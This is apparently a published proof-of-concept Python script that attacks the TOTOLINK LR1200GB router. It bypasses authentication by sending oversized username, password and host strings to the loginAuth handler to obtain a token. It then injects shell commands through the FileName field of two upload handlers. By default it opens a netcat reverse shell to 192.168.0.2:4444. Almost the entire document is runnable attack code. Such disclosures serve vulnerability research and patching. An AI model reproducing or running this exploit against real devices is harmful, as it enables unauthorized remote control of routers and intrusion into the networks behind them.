Created
February 14, 2024 03:16
TOTOLINK LR1200GB Authentication Bypass and RCE — proof-of-concept exploit script (Python 3; needs the third-party `requests` and `colorama` packages).
#!/usr/bin/python3 | |
import argparse
import json
import sys

import requests
from colorama import Fore, Style
# Endpoint every request in this script is POSTed to. 192.168.0.1 is presumably the
# router's LAN-side address; point this elsewhere if the target is not there.
URL = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
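def login_bypass():
    """Request a session token from the router's ``loginAuth`` handler.

    The request carries the module globals ``username``, ``password`` and
    ``host`` (populated by main(); its defaults are long runs of 'A') with
    ``verify`` and ``flag`` forced to 0. When the handler answers with a JSON
    object that contains a ``token``, the token is printed and returned; the
    RCE functions embed it in their own payloads.

    Returns:
        str: the token from the router's response.

    Exits with status 1 when the HTTP request fails, the body is not a JSON
    object, or it carries no token -- nothing downstream works without one.
    (A non-zero status so a wrapper can tell failure from success.)
    """
    login_bypass_payload = {
        "username": username,
        "password": password,
        "http_host": host,
        "verify": 0,
        "flag": 0,
        "topicurl": "loginAuth",
    }

    try:
        # 1-second timeout: an unreachable or silent target is reported, not hung on.
        response = requests.post(URL, json=login_bypass_payload, timeout=1)
    except requests.exceptions.RequestException as exc:
        print(f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Request to {URL} failed: {exc}")
        sys.exit(1)

    try:
        body = json.loads(response.text)
    except json.JSONDecodeError:
        print(f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to decode the json")
        sys.exit(1)

    # Guard the .get(): a JSON list or scalar body would otherwise raise AttributeError.
    token = body.get("token") if isinstance(body, dict) else None
    if not token:
        print(f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to get the token")
        sys.exit(1)

    print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Token: {token}")
    return token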
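def build_injection_payload(topicurl, command, token):
    """Build the JSON body that smuggles ``command`` through an upload handler.

    ``command`` is spliced verbatim between shell separators in the
    ``FileName`` field, so the value the router receives is
    ``File File;<command>; ls -al >`` -- presumably evaluated by a shell on the
    device. Nothing is quoted or escaped: a ``;``, ``|`` or quote character
    inside ``command`` changes the injected command line.

    Args:
        topicurl: handler name, ``UploadFirmwareFile`` or ``setUploadSetting``.
        command: shell command to run on the router.
        token: session token obtained from login_bypass().

    Returns:
        dict: the payload to POST to ``URL``.
    """
    return {
        "FileName": "File File;" + command + "; ls -al >",
        "FullName": "File",
        "ContentLength": "10000",
        "topicurl": topicurl,
        "token": token,
    }


def send_injection(topicurl):
    """Fetch a token, then POST the injected ``cmd`` (module global) to ``topicurl``.

    login_bypass() exits the script itself when it cannot get a token.
    A read timeout is reported rather than raised: if the injected command
    never returns (the default reverse shell does not), the handler may never
    answer, so a timeout here is not evidence that the injection failed.
    """
    print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Executing command: {cmd}")
    payload = build_injection_payload(topicurl, cmd, login_bypass())
    try:
        response = requests.post(URL, json=payload, timeout=1)
    except requests.exceptions.ReadTimeout:
        print(
            f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} No reply within 1s; "
            "the command may be running (blocking payloads never answer)"
        )
        return
    except requests.exceptions.RequestException as exc:
        print(f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Request to {URL} failed: {exc}")
        sys.exit(1)
    print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Router answered HTTP {response.status_code}")


def upload_firmware_file_rce():
    """Run ``cmd`` through the ``UploadFirmwareFile`` handler."""
    send_injection("UploadFirmwareFile")


def set_upload_setting_rce():
    """Run ``cmd`` through the ``setUploadSetting`` handler (same injection, other handler)."""
    send_injection("setUploadSetting")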
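def main():
    """Parse the command line, fill the module globals, and run one exploit.

    The exploit functions read ``username``, ``password``, ``host`` and ``cmd``
    as module globals rather than taking parameters, so they are populated here
    before dispatch. ``-e`` is restricted to the three known exploit names
    through a closed dispatch table; resolving it against ``globals()`` would
    let it name ``main`` itself or any other module-level callable.
    """
    # Declared up front: URL is read for the --url default below and reassigned after parsing.
    global username, password, host, cmd, URL

    # Closed dispatch table: the only names -e may resolve to.
    exploits = {
        "login_bypass": login_bypass,
        "set_upload_setting_rce": set_upload_setting_rce,
        "upload_firmware_file_rce": upload_firmware_file_rce,
    }

    parser = argparse.ArgumentParser(
        description="TOTOLINK LR1200GB authentication bypass / command injection PoC."
    )
    parser.add_argument(
        "-u", "--username", type=str, required=False,
        help="Username sent to loginAuth (default: 50 x 'A')",
    )
    parser.add_argument(
        "-p", "--password", type=str, required=False,
        help="Password sent to loginAuth (default: 12 x 'A')",
    )
    parser.add_argument(
        "-e", "--exploit", type=str, required=True, choices=sorted(exploits),
        help="Exploit to run",
    )
    parser.add_argument(
        "-t", "--host", type=str, required=False,
        help="Value sent in the http_host field of the loginAuth request -- "
             "NOT the target address, see --url (default: 304 x 'A')",
    )
    parser.add_argument(
        "-c", "--cmd", type=str, required=False,
        help="Shell command injected by the *_rce exploits (default: reverse shell "
             "to 192.168.0.2:4444 -- start a listener there first)",
    )
    parser.add_argument(
        "--url", type=str, default=URL,
        help=f"cstecgi.cgi endpoint of the target router (default: {URL})",
    )
    args = parser.parse_args()

    # Oversized defaults are part of the bypass request itself, not placeholders.
    username = args.username or "A" * 50
    password = args.password or "A" * 12
    host = args.host or "A" * 304
    # Default payload is a reverse shell back to 192.168.0.2:4444.
    cmd = args.cmd or "nc 192.168.0.2 4444 -e /bin/sh"
    URL = args.url

    exploits[args.exploit]()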
# Script entry point; importing this module as a library runs nothing.
if __name__ == "__main__":
    main()